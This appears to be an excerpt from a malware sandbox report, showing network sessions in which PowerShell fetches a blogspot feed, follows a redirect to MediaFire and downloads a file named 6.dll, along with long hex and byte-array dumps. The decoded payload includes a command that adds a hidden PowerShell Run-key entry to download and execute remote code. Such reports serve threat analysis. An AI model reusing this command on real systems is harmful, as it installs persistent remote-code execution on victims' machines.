                                                                                                                                                                      2022-01-14 11:21:11 UTC827INData Raw: 2c 38 2c 31 31 38 2c 35 2c 31 32 33 2c 31 33 30 2c 31 32 35 2c 31 39 33 2c 31 36 37 2c 31 39 32 2c 31 36 37 2c 31 39 33 2c 33 33 2c 31 39 38 2c 34 34 2c 32 32 36 2c 31 31 32 2c 32 34 30 2c 32 35 2c 39 39 2c 35 35 2c 32 32 36 2c 38 38 2c 32 32 37 2c 32 31 31 2c 31 39 36 2c 39 2c 31 39 38 2c 31 34 35 2c 31 39 36 2c 32 30 31 2c 31 39 38 2c 39 2c 31 39 36 2c 31 30 33 2c 31 34 31 2c 35 31 2c 31 33 36 2c 32 30 37 2c 31 32 39 2c 32 30 37 2c 31 33 31 2c 32 34 33 2c 31 34 30 2c 31 31 2c 31 33 36 2c 32 33 37 2c 31 38 39 2c 35 37 2c 32 33 2c 32 36 2c 39 35 2c 33 35 2c 31 39 30 2c 31 30 38 2c 39 32 2c 36 39 2c 31 32 34 2c 32 31 33 2c 32 34 38 2c 33 30 2c 32 34 31 2c 31 31 37 2c 32 32 37 2c 31 39 39 2c 31 32 34 2c 31 35 38 2c 32 32 32 2c 31 35 36 2c 31 31 31 2c 31 36
                                                                                                                                                                      Data Ascii: ,8,118,5,123,130,125,193,167,192,167,193,33,198,44,226,112,240,25,99,55,226,88,227,211,196,9,198,145,196,201,198,9,196,103,141,51,136,207,129,207,131,243,140,11,136,237,189,57,23,26,95,35,190,108,92,69,124,213,248,30,241,117,227,199,124,158,222,156,111,16
                                                                                                                                                                      2022-01-14 11:21:11 UTC843INData Raw: 2c 33 36 2c 32 33 36 2c 31 37 32 2c 31 38 30 2c 35 31 2c 34 38 2c 32 30 33 2c 37 31 2c 39 38 2c 31 39 31 2c 31 31 2c 39 2c 35 35 2c 31 36 39 2c 32 30 37 2c 31 34 36 2c 32 30 35 2c 31 36 32 2c 31 31 38 2c 32 35 2c 31 38 31 2c 31 30 31 2c 32 31 30 2c 31 37 34 2c 33 39 2c 32 32 30 2c 31 36 36 2c 32 31 38 2c 31 35 37 2c 34 35 2c 31 39 34 2c 31 31 30 2c 31 36 31 2c 32 32 2c 31 38 34 2c 38 35 2c 32 31 36 2c 36 33 2c 31 37 36 2c 32 34 36 2c 32 31 30 2c 33 30 2c 31 39 33 2c 37 34 2c 31 38 33 2c 32 31 34 2c 39 35 2c 37 2c 31 39 37 2c 31 33 31 2c 37 30 2c 32 35 35 2c 38 38 2c 32 31 32 2c 31 32 2c 31 33 37 2c 31 38 38 2c 31 31 38 2c 32 34 39 2c 39 39 2c 38 31 2c 31 31 35 2c 37 36 2c 31 31 36 2c 31 36 33 2c 32 31 38 2c 31 37 37 2c 32 33 37 2c 31 36 32 2c 32 33 30 2c
                                                                                                                                                                      Data Ascii: ,36,236,172,180,51,48,203,71,98,191,11,9,55,169,207,146,205,162,118,25,181,101,210,174,39,220,166,218,157,45,194,110,161,22,184,85,216,63,176,246,210,30,193,74,183,214,95,7,197,131,70,255,88,212,12,137,188,118,249,99,81,115,76,116,163,218,177,237,162,230,
                                                                                                                                                                      2022-01-14 11:21:11 UTC859INData Raw: 37 30 2c 31 36 32 2c 32 30 32 2c 35 34 2c 31 36 33 2c 32 35 33 2c 32 30 31 2c 39 39 2c 31 37 30 2c 31 30 38 2c 31 30 33 2c 31 31 35 2c 31 32 36 2c 31 34 39 2c 35 34 2c 39 38 2c 32 30 33 2c 31 35 31 2c 32 30 35 2c 31 30 39 2c 34 34 2c 31 35 34 2c 36 39 2c 31 37 36 2c 32 34 39 2c 34 34 2c 31 33 34 2c 31 39 37 2c 31 37 39 2c 37 36 2c 31 32 32 2c 39 33 2c 31 30 30 2c 31 35 35 2c 32 38 2c 37 36 2c 32 33 34 2c 31 31 37 2c 31 31 38 2c 31 34 31 2c 32 33 32 2c 32 30 37 2c 32 35 34 2c 31 31 33 2c 31 37 36 2c 31 36 2c 31 33 2c 31 34 32 2c 31 34 31 2c 32 31 33 2c 31 38 37 2c 31 37 32 2c 34 39 2c 38 31 2c 38 31 2c 31 35 34 2c 31 38 2c 32 39 2c 31 34 39 2c 32 33 38 2c 36 38 2c 31 35 2c 31 30 31 2c 35 38 2c 31 37 37 2c 31 34 36 2c 32 30 35 2c 33 37 2c 32 35 30 2c 31 37
                                                                                                                                                                      Data Ascii: 70,162,202,54,163,253,201,99,170,108,103,115,126,149,54,98,203,151,205,109,44,154,69,176,249,44,134,197,179,76,122,93,100,155,28,76,234,117,118,141,232,207,254,113,176,16,13,142,141,213,187,172,49,81,81,154,18,29,149,238,68,15,101,58,177,146,205,37,250,17
                                                                                                                                                                      2022-01-14 11:21:11 UTC875INData Raw: 2c 31 38 35 2c 31 38 2c 32 32 31 2c 32 33 32 2c 31 37 31 2c 35 39 2c 32 30 39 2c 36 36 2c 34 37 2c 31 35 2c 31 32 32 2c 31 32 31 2c 32 31 30 2c 32 30 33 2c 31 33 39 2c 39 34 2c 32 32 32 2c 31 38 30 2c 32 32 31 2c 31 33 35 2c 39 34 2c 31 39 30 2c 32 34 34 2c 31 30 36 2c 36 38 2c 32 34 34 2c 31 36 33 2c 31 37 35 2c 32 35 34 2c 32 34 34 2c 31 30 36 2c 37 36 2c 31 37 35 2c 30 2c 39 38 2c 33 32 2c 31 38 39 2c 31 33 30 2c 32 33 32 2c 32 31 2c 37 36 2c 33 30 2c 36 36 2c 31 38 30 2c 32 31 30 2c 34 33 2c 31 34 38 2c 32 31 38 2c 39 37 2c 32 34 34 2c 31 37 38 2c 32 30 39 2c 34 33 2c 31 35 36 2c 39 34 2c 31 31 38 2c 31 32 32 2c 36 39 2c 32 30 38 2c 34 33 2c 31 34 36 2c 39 34 2c 38 31 2c 32 34 34 2c 31 33 38 2c 31 36 36 2c 38 37 2c 31 32 2c 31 38 39 2c 39 38 2c 31 33
                                                                                                                                                                      Data Ascii: ,185,18,221,232,171,59,209,66,47,15,122,121,210,203,139,94,222,180,221,135,94,190,244,106,68,244,163,175,254,244,106,76,175,0,98,32,189,130,232,21,76,30,66,180,210,43,148,218,97,244,178,209,43,156,94,118,122,69,208,43,146,94,81,244,138,166,87,12,189,98,13
                                                                                                                                                                      2022-01-14 11:21:11 UTC890INData Raw: 31 35 36 2c 31 36 36 2c 32 31 36 2c 37 32 2c 36 39 2c 32 32 34 2c 32 34 2c 37 30 2c 31 31 35 2c 31 30 35 2c 31 31 39 2c 31 35 33 2c 31 35 35 2c 31 36 31 2c 31 39 2c 38 36 2c 31 30 39 2c 31 30 34 2c 39 38 2c 33 33 2c 31 35 33 2c 31 35 35 2c 32 31 35 2c 31 35 2c 32 37 2c 32 31 39 2c 31 39 35 2c 32 31 32 2c 36 34 2c 35 30 2c 31 32 2c 31 38 30 2c 34 30 2c 36 2c 36 34 2c 36 38 2c 31 36 32 2c 31 39 38 2c 31 34 36 2c 33 37 2c 32 33 37 2c 33 37 2c 37 34 2c 39 32 2c 31 38 30 2c 33 30 2c 31 36 37 2c 32 30 37 2c 31 36 30 2c 33 37 2c 31 37 38 2c 33 35 2c 32 33 36 2c 31 35 37 2c 31 39 31 2c 32 35 2c 32 32 33 2c 31 32 37 2c 33 39 2c 39 30 2c 32 32 30 2c 38 39 2c 31 34 33 2c 31 30 38 2c 32 34 34 2c 32 34 31 2c 31 31 39 2c 33 33 2c 35 2c 39 37 2c 35 35 2c 34 36 2c 31 38
                                                                                                                                                                      Data Ascii: 156,166,216,72,69,224,24,70,115,105,119,153,155,161,19,86,109,104,98,33,153,155,215,15,27,219,195,212,64,50,12,180,40,6,64,68,162,198,146,37,237,37,74,92,180,30,167,207,160,37,178,35,236,157,191,25,223,127,39,90,220,89,143,108,244,241,119,33,5,97,55,46,18
                                                                                                                                                                      2022-01-14 11:21:11 UTC906INData Raw: 2c 32 33 36 2c 31 35 2c 31 33 35 2c 31 35 32 2c 31 30 33 2c 31 35 33 2c 31 37 36 2c 37 30 2c 34 30 2c 31 39 2c 35 34 2c 38 2c 31 35 39 2c 31 33 2c 34 32 2c 39 35 2c 36 30 2c 32 30 36 2c 31 35 36 2c 35 35 2c 31 33 31 2c 39 2c 31 35 39 2c 39 35 2c 31 36 38 2c 32 33 31 2c 32 2c 39 2c 33 37 2c 31 31 37 2c 31 38 39 2c 34 2c 31 39 34 2c 33 33 2c 32 34 31 2c 31 30 36 2c 37 32 2c 32 34 39 2c 35 38 2c 36 37 2c 31 38 2c 31 31 39 2c 34 33 2c 31 37 32 2c 31 32 34 2c 31 39 30 2c 32 30 30 2c 32 31 38 2c 39 35 2c 31 34 36 2c 32 35 34 2c 31 38 2c 32 34 38 2c 32 30 2c 39 33 2c 31 32 33 2c 31 33 34 2c 32 32 38 2c 38 37 2c 38 30 2c 31 34 33 2c 33 35 2c 31 32 31 2c 32 32 33 2c 39 2c 34 31 2c 31 31 32 2c 36 36 2c 32 30 30 2c 31 37 35 2c 31 32 39 2c 31 36 33 2c 36 36 2c 31 38
                                                                                                                                                                      Data Ascii: ,236,15,135,152,103,153,176,70,40,19,54,8,159,13,42,95,60,206,156,55,131,9,159,95,168,231,2,9,37,117,189,4,194,33,241,106,72,249,58,67,18,119,43,172,124,190,200,218,95,146,254,18,248,20,93,123,134,228,87,80,143,35,121,223,9,41,112,66,200,175,129,163,66,18
                                                                                                                                                                      2022-01-14 11:21:11 UTC922INData Raw: 37 2c 34 38 2c 38 2c 36 37 2c 32 34 35 2c 38 2c 32 35 35 2c 31 39 36 2c 31 30 36 2c 31 39 31 2c 33 35 2c 31 31 2c 32 39 2c 31 34 35 2c 37 2c 31 34 33 2c 32 32 37 2c 31 35 37 2c 31 32 39 2c 34 36 2c 34 33 2c 39 38 2c 31 38 32 2c 31 33 36 2c 39 35 2c 35 36 2c 32 30 39 2c 37 2c 31 32 31 2c 31 30 36 2c 36 39 2c 32 32 37 2c 31 31 39 2c 32 33 37 2c 31 35 2c 31 33 32 2c 31 35 31 2c 34 31 2c 32 33 32 2c 31 34 33 2c 32 30 30 2c 32 34 34 2c 37 31 2c 32 31 34 2c 31 31 30 2c 31 30 35 2c 31 39 39 2c 36 2c 32 33 30 2c 31 30 37 2c 31 31 37 2c 31 37 2c 31 39 31 2c 31 31 36 2c 32 33 31 2c 31 34 35 2c 31 30 33 2c 32 35 33 2c 31 30 33 2c 31 36 2c 31 38 36 2c 32 33 34 2c 31 30 31 2c 32 33 32 2c 31 34 39 2c 31 35 2c 34 34 2c 31 32 31 2c 32 34 2c 32 32 36 2c 35 36 2c 33 31 2c
                                                                                                                                                                      Data Ascii: 7,48,8,67,245,8,255,196,106,191,35,11,29,145,7,143,227,157,129,46,43,98,182,136,95,56,209,7,121,106,69,227,119,237,15,132,151,41,232,143,200,244,71,214,110,105,199,6,230,107,117,17,191,116,231,145,103,253,103,16,186,234,101,232,149,15,44,121,24,226,56,31,
                                                                                                                                                                      2022-01-14 11:21:11 UTC938INData Raw: 31 39 30 2c 32 38 2c 31 36 35 2c 31 39 39 2c 32 34 34 2c 31 38 30 2c 37 35 2c 31 30 35 2c 33 33 2c 31 39 38 2c 31 32 34 2c 31 34 36 2c 32 30 35 2c 35 30 2c 35 34 2c 32 39 2c 34 35 2c 39 36 2c 32 38 2c 31 37 32 2c 31 35 34 2c 31 30 37 2c 32 35 33 2c 32 33 35 2c 31 35 2c 32 31 31 2c 32 39 2c 31 33 2c 33 38 2c 31 36 36 2c 31 34 31 2c 32 33 34 2c 35 33 2c 35 31 2c 31 38 33 2c 31 33 31 2c 32 32 32 2c 37 39 2c 32 32 32 2c 34 37 2c 35 36 2c 32 33 2c 38 31 2c 31 30 30 2c 31 30 32 2c 34 35 2c 32 32 33 2c 31 35 32 2c 38 38 2c 32 32 30 2c 32 34 38 2c 32 34 32 2c 35 31 2c 38 30 2c 32 2c 31 30 37 2c 38 37 2c 32 33 36 2c 34 32 2c 31 35 32 2c 38 39 2c 33 38 2c 32 31 37 2c 36 39 2c 32 32 38 2c 31 31 2c 32 30 30 2c 31 33 31 2c 32 32 31 2c 31 35 36 2c 37 34 2c 39 31 2c 34
                                                                                                                                                                      Data Ascii: 190,28,165,199,244,180,75,105,33,198,124,146,205,50,54,29,45,96,28,172,154,107,253,235,15,211,29,13,38,166,141,234,53,51,183,131,222,79,222,47,56,23,81,100,102,45,223,152,88,220,248,242,51,80,2,107,87,236,42,152,89,38,217,69,228,11,200,131,221,156,74,91,4
                                                                                                                                                                      2022-01-14 11:21:11 UTC954INData Raw: 31 2c 38 39 2c 32 32 37 2c 32 30 30 2c 31 32 38 2c 31 30 2c 35 33 2c 31 38 38 2c 31 37 33 2c 31 39 36 2c 31 39 38 2c 31 35 34 2c 32 31 38 2c 31 30 38 2c 37 32 2c 34 30 2c 32 31 36 2c 31 34 34 2c 31 35 2c 34 37 2c 31 34 34 2c 37 2c 36 34 2c 31 39 39 2c 32 31 37 2c 31 32 2c 32 30 30 2c 32 30 38 2c 31 34 30 2c 32 35 2c 31 30 38 2c 39 37 2c 31 36 30 2c 31 33 32 2c 31 36 35 2c 31 30 34 2c 31 37 36 2c 32 30 35 2c 34 32 2c 31 34 35 2c 31 38 39 2c 31 35 36 2c 31 33 2c 31 30 31 2c 31 31 33 2c 31 38 32 2c 31 38 2c 32 33 36 2c 33 33 2c 36 37 2c 31 33 37 2c 32 30 31 2c 31 37 34 2c 32 30 31 2c 32 31 39 2c 31 38 37 2c 31 39 31 2c 33 36 2c 31 31 31 2c 32 33 39 2c 35 33 2c 35 34 2c 31 2c 31 31 33 2c 32 30 34 2c 31 36 33 2c 31 39 31 2c 32 34 38 2c 31 34 36 2c 38 32 2c 31
                                                                                                                                                                      Data Ascii: 1,89,227,200,128,10,53,188,173,196,198,154,218,108,72,40,216,144,15,47,144,7,64,199,217,12,200,208,140,25,108,97,160,132,165,104,176,205,42,145,189,156,13,101,113,182,18,236,33,67,137,201,174,201,219,187,191,36,111,239,53,54,1,113,204,163,191,248,146,82,1


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      7192.168.2.349834142.250.186.129443C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                      2022-01-14 11:21:17 UTC965OUTGET /atom.xml HTTP/1.1
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
                                                                                                                                                                      Host: p6tbbb.blogspot.com
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      2022-01-14 11:21:17 UTC966INHTTP/1.1 302 Found
                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                      ETag: W/"76994fcf688c1d67e3733d8c335322d774ccdec6a6cee5a150ea445829fd35f1"
                                                                                                                                                                      Date: Fri, 14 Jan 2022 11:21:17 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Server: blogger-renderd
                                                                                                                                                                      Expires: Fri, 14 Jan 2022 11:21:18 GMT
                                                                                                                                                                      Cache-Control: public, must-revalidate, proxy-revalidate, max-age=1
                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                      Location: https://www.mediafire.com/file/5avuvurhf9r42y3/6.dll/file
                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                      Connection: close


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      8192.168.2.349835104.16.202.237443C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                      2022-01-14 11:21:17 UTC966OUTGET /file/5avuvurhf9r42y3/6.dll/file HTTP/1.1
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
                                                                                                                                                                      Host: www.mediafire.com
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      2022-01-14 11:21:18 UTC966INHTTP/1.1 302 Found
                                                                                                                                                                      Date: Fri, 14 Jan 2022 11:21:18 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Set-Cookie: ukey=s7huv8g43j1r0etull8h9ns6aiwyny7l; expires=Tue, 14-Jan-2042 11:21:18 GMT; Max-Age=631152000; path=/; domain=.mediafire.com; HttpOnly
                                                                                                                                                                      Strict-Transport-Security: max-age=0
                                                                                                                                                                      Access-Control-Allow-Origin: https://www.mediafire.com
                                                                                                                                                                      Location: https://download2262.mediafire.com/1rxjqgtrygkg/5avuvurhf9r42y3/6.dll
                                                                                                                                                                      Report-To: {"group": "mediafirenel", "max_age": 86400, "include_subdomains": true, "endpoints": [{"url": "https://browser-reports.mediafire.dev/network-error"}]}
                                                                                                                                                                      NEL: {"report_to": "mediafirenel", "max_age": 86400, "include_subdomains": true, "failure_fraction": 0.01}
                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                      Set-Cookie: __cf_bm=J48jKY80L4vekZlTulNazJn9_8Kc6roTO05sIZmXGYU-1642159278-0-AZNkZ79+DEEY8vaOdewnar8BWaW+TknYGniGDCCs5gjuaTLSHFawSVLDp7OTuPiloYyEg+y3bxt04+LJANBSUQ8=; path=/; expires=Fri, 14-Jan-22 11:51:18 GMT; domain=.mediafire.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 6cd67ade699d4e07-FRA
                                                                                                                                                                      2022-01-14 11:21:18 UTC968INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      9192.168.2.349836199.91.155.3443C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                      2022-01-14 11:21:18 UTC968OUTGET /1rxjqgtrygkg/5avuvurhf9r42y3/6.dll HTTP/1.1
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
                                                                                                                                                                      Host: download2262.mediafire.com
                                                                                                                                                                      Cookie: ukey=s7huv8g43j1r0etull8h9ns6aiwyny7l
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      2022-01-14 11:21:19 UTC968INHTTP/1.1 200 OK
                                                                                                                                                                      server: dsp-0.0.1
                                                                                                                                                                      content-type: text/plain
                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                      connection: close
                                                                                                                                                                      content-encoding: binary
                                                                                                                                                                      cache-control: no-store
                                                                                                                                                                      x-robots-tag: noindex, nofollow
                                                                                                                                                                      content-disposition: attachment; filename="6.dll"
                                                                                                                                                                      content-length: 490941
                                                                                                                                                                      date: Fri, 14 Jan 2022 11:21:18 GMT
                                                                                                                                                                      2022-01-14 11:21:19 UTC968INData Raw: 73 74 61 72 74 2d 73 6c 65 65 70 20 2d 73 20 35 0d 0a 4e 65 77 2d 49 74 65 6d 50 72 6f 70 65 72 74 79 20 2d 50 61 74 68 20 22 48 4b 43 55 3a 5c 53 4f 46 54 57 41 52 45 5c 4d 69 63 72 6f 73 6f 66 74 5c 57 69 6e 64 6f 77 73 5c 43 75 72 72 65 6e 74 56 65 72 73 69 6f 6e 5c 52 75 6e 22 20 2d 4e 61 6d 65 20 22 4e 65 74 77 72 69 78 50 61 72 61 6d 22 20 2d 56 61 6c 75 65 20 22 70 6f 77 65 72 73 68 65 6c 6c 20 2d 77 20 68 20 2d 4e 6f 50 72 6f 66 69 6c 65 20 2d 45 78 65 63 75 74 69 6f 6e 50 6f 6c 69 63 79 20 42 79 70 61 73 73 20 2d 43 6f 6d 6d 61 6e 64 20 73 74 61 72 74 2d 73 6c 65 65 70 20 2d 73 20 32 30 3b 69 77 72 20 22 22 68 74 74 70 73 3a 2f 2f 70 36 74 62 62 62 2e 62 6c 6f 67 73 70 6f 74 2e 63 6f 6d 2f 61 74 6f 6d 2e 78 6d 6c 22 22 20 2d 75 73 65 42 7c 69 65
                                                                                                                                                                      Data Ascii: start-sleep -s 5New-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -Name "NetwrixParam" -Value "powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr ""https://p6tbbb.blogspot.com/atom.xml"" -useB|ie
                                                                                                                                                                      2022-01-14 11:21:19 UTC984INData Raw: 2c 32 31 2c 32 34 38 2c 38 38 2c 39 32 2c 32 32 34 2c 32 33 35 2c 32 32 37 2c 32 32 39 2c 32 34 38 2c 31 38 38 2c 31 33 31 2c 31 35 39 2c 39 33 2c 31 32 39 2c 32 33 39 2c 33 39 2c 32 35 35 2c 31 35 35 2c 34 2c 32 34 35 2c 38 36 2c 32 31 2c 32 34 31 2c 32 34 2c 37 2c 32 34 36 2c 31 34 33 2c 31 39 35 2c 34 36 2c 37 30 2c 31 34 36 2c 37 38 2c 31 37 31 2c 31 31 34 2c 32 35 30 2c 31 35 33 2c 32 34 33 2c 32 33 39 2c 38 36 2c 32 34 32 2c 31 34 34 2c 31 33 34 2c 33 37 2c 31 38 39 2c 36 35 2c 31 39 31 2c 32 31 37 2c 31 34 36 2c 31 31 36 2c 33 34 2c 32 31 33 2c 31 34 36 2c 31 31 36 2c 36 31 2c 32 35 33 2c 32 32 32 2c 39 34 2c 39 33 2c 36 32 2c 36 32 2c 31 38 38 2c 36 36 2c 32 35 34 2c 31 37 39 2c 32 30 39 2c 32 35 34 2c 35 33 2c 31 39 37 2c 32 34 34 2c 32 37 2c 31
                                                                                                                                                                      Data Ascii: ,21,248,88,92,224,235,227,229,248,188,131,159,93,129,239,39,255,155,4,245,86,21,241,24,7,246,143,195,46,70,146,78,171,114,250,153,243,239,86,242,144,134,37,189,65,191,217,146,116,34,213,146,116,61,253,222,94,93,62,62,188,66,254,179,209,254,53,197,244,27,1
                                                                                                                                                                      2022-01-14 11:21:19 UTC1000INData Raw: 31 36 33 2c 31 39 30 2c 32 32 37 2c 32 36 2c 31 38 37 2c 31 35 37 2c 31 32 38 2c 33 38 2c 31 32 35 2c 33 30 2c 37 38 2c 32 39 2c 31 31 38 2c 32 32 38 2c 38 33 2c 31 33 35 2c 36 35 2c 36 32 2c 31 31 37 2c 31 35 32 2c 31 39 39 2c 31 36 37 2c 31 34 2c 38 31 2c 36 32 2c 31 31 37 2c 35 36 2c 34 2c 31 36 37 2c 31 34 2c 37 37 2c 35 36 2c 31 31 36 2c 34 38 2c 35 34 2c 31 33 36 2c 32 32 37 2c 31 33 31 2c 31 30 36 2c 31 38 39 2c 32 31 2c 32 33 31 2c 31 34 2c 31 39 38 2c 32 32 33 2c 31 33 32 2c 38 37 2c 32 31 33 2c 31 39 31 2c 31 33 37 2c 31 36 33 2c 37 2c 32 32 37 2c 31 38 37 2c 31 39 34 2c 31 35 35 2c 31 37 32 2c 32 33 31 2c 31 39 35 2c 31 33 35 2c 31 39 31 2c 31 38 37 2c 31 33 35 2c 31 35 2c 31 38 33 2c 35 38 2c 31 33 35 2c 31 35 2c 31 32 32 2c 31 34 36 2c 37 39
                                                                                                                                                                      Data Ascii: 163,190,227,26,187,157,128,38,125,30,78,29,118,228,83,135,65,62,117,152,199,167,14,81,62,117,56,4,167,14,77,56,116,48,54,136,227,131,106,189,21,231,14,198,223,132,87,213,191,137,163,7,227,187,194,155,172,231,195,135,191,187,135,15,183,58,135,15,122,146,79
                                                                                                                                                                      2022-01-14 11:21:19 UTC1016INData Raw: 32 33 33 2c 32 31 32 2c 32 35 35 2c 31 36 35 2c 37 38 2c 31 36 37 2c 32 35 34 2c 31 31 39 2c 31 35 37 2c 32 33 38 2c 32 36 2c 39 38 2c 38 33 2c 31 38 32 2c 34 37 2c 32 35 35 2c 31 33 30 2c 31 31 36 2c 31 31 37 2c 37 36 2c 36 35 2c 32 34 36 2c 37 39 2c 31 39 31 2c 31 31 32 2c 32 34 35 2c 32 34 37 2c 31 33 39 2c 39 2c 32 32 36 2c 32 30 31 2c 32 30 30 2c 39 34 2c 32 34 35 2c 35 2c 36 33 2c 31 31 2c 31 32 32 2c 32 33 38 2c 32 33 2c 31 35 38 2c 39 37 2c 31 30 39 2c 31 30 39 2c 31 37 30 2c 32 32 38 2c 32 34 38 2c 31 30 37 2c 31 39 35 2c 33 33 2c 35 36 2c 32 30 36 2c 32 34 30 2c 31 30 32 2c 31 31 35 2c 32 31 37 2c 31 38 38 2c 32 30 35 2c 39 33 2c 38 34 2c 31 33 36 2c 32 30 37 2c 31 34 34 2c 32 30 35 2c 31 33 35 2c 31 35 37 2c 31 34 32 2c 31 38 34 2c 36 2c 32 31
                                                                                                                                                                      Data Ascii: 233,212,255,165,78,167,254,119,157,238,26,98,83,182,47,255,130,116,117,76,65,246,79,191,112,245,247,139,9,226,201,200,94,245,5,63,11,122,238,23,158,97,109,109,170,228,248,107,195,33,56,206,240,102,115,217,188,205,93,84,136,207,144,205,135,157,142,184,6,21
                                                                                                                                                                      2022-01-14 11:21:19 UTC1032INData Raw: 31 38 34 2c 31 30 38 2c 31 37 33 2c 38 37 2c 37 36 2c 32 34 33 2c 39 2c 31 31 31 2c 36 32 2c 34 2c 31 30 30 2c 32 30 34 2c 31 30 39 2c 32 37 2c 32 32 39 2c 31 35 36 2c 34 34 2c 34 30 2c 39 37 2c 31 38 35 2c 32 32 33 2c 31 33 34 2c 31 38 39 2c 30 2c 36 30 2c 33 34 2c 38 32 2c 38 38 2c 31 2c 32 33 31 2c 36 38 2c 37 36 2c 36 39 2c 37 35 2c 31 37 32 2c 31 30 31 2c 32 31 34 2c 36 32 2c 31 38 38 2c 33 31 2c 31 30 33 2c 32 34 35 2c 39 30 2c 37 2c 31 33 37 2c 31 30 33 2c 36 39 2c 32 36 2c 32 34 33 2c 37 2c 31 38 33 2c 39 30 2c 31 33 35 2c 32 32 35 2c 38 35 2c 31 38 2c 32 33 35 2c 34 38 2c 32 33 35 2c 32 34 30 2c 31 35 32 2c 39 35 2c 31 35 35 2c 33 30 2c 31 31 2c 32 34 39 2c 32 31 31 2c 32 33 35 2c 38 37 2c 37 31 2c 35 35 2c 31 32 2c 39 36 2c 36 2c 32 30 31 2c 32
                                                                                                                                                                      Data Ascii: 184,108,173,87,76,243,9,111,62,4,100,204,109,27,229,156,44,40,97,185,223,134,189,0,60,34,82,88,1,231,68,76,69,75,172,101,214,62,188,31,103,245,90,7,137,103,69,26,243,7,183,90,135,225,85,18,235,48,235,240,152,95,155,30,11,249,211,235,87,71,55,12,96,6,201,2
                                                                                                                                                                      2022-01-14 11:21:19 UTC1048INData Raw: 32 36 2c 31 34 39 2c 39 39 2c 32 32 32 2c 31 38 32 2c 32 30 38 2c 34 2c 32 30 34 2c 31 31 37 2c 31 36 2c 32 34 30 2c 34 38 2c 33 39 2c 38 31 2c 31 36 37 2c 32 32 35 2c 32 30 35 2c 33 37 2c 31 38 38 2c 30 2c 32 31 33 2c 32 32 30 2c 31 35 35 2c 31 39 37 2c 38 34 2c 31 33 32 2c 31 35 2c 37 38 2c 32 31 32 2c 32 32 37 2c 31 30 37 2c 33 33 2c 31 39 39 2c 31 38 35 2c 31 37 38 2c 32 38 2c 32 32 2c 32 33 30 2c 31 37 38 2c 31 37 31 2c 31 39 2c 32 2c 32 30 32 2c 31 32 2c 31 37 33 2c 31 36 36 2c 31 30 2c 31 31 38 2c 32 30 38 2c 31 37 31 2c 32 30 35 2c 31 31 31 2c 31 35 30 2c 31 31 37 2c 31 34 2c 37 31 2c 32 33 34 2c 33 35 2c 31 34 32 2c 32 30 38 2c 31 34 37 2c 32 34 34 2c 32 34 33 2c 32 34 35 2c 31 37 32 2c 31 38 34 2c 32 34 39 2c 38 30 2c 32 34 31 2c 31 36 33 2c 32
                                                                                                                                                                      Data Ascii: 26,149,99,222,182,208,4,204,117,16,240,48,39,81,167,225,205,37,188,0,213,220,155,197,84,132,15,78,212,227,107,33,199,185,178,28,22,230,178,171,19,2,202,12,173,166,10,118,208,171,205,111,150,117,14,71,234,35,142,208,147,244,243,245,172,184,249,80,241,163,2
